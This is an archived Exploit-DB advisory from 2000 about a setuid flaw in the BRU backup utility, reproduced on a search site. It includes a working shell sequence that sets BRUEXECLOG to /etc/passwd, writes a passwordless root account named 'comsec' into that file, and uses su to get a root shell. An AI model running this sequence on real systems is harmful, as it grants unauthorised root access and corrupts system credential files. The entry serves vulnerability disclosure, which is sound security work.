Lucene search

K
exploitdbRiley HassellEDB-ID:19999
HistoryJun 05, 2000 - 12:00 a.m.

BRU 15.1/16.0 - BRUEXECLOG Environment Variable

2000-06-0500:00:00
Riley Hassell
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/1321/info

A vulnerability exists in BRU, the Backup and Restore Utility, from Enhanced Software Technologies. By setting the value of the BRUEXECLOG environment variable, it is possible to an attack to alter and create files on the filesystem. As BRU is installed setuid, these files are owned by root. This vulnerability can be easily used by local users to obtain root privileges.

$ BRUEXECLOG=/etc/passwd
$ export BRUEXECLOG
$ bru -V '
> comsec::0:0::/:/bin/sh
> '
$ su comsec
# 

AI Score

7.4

Confidence

Low

Related for EDB-ID:19999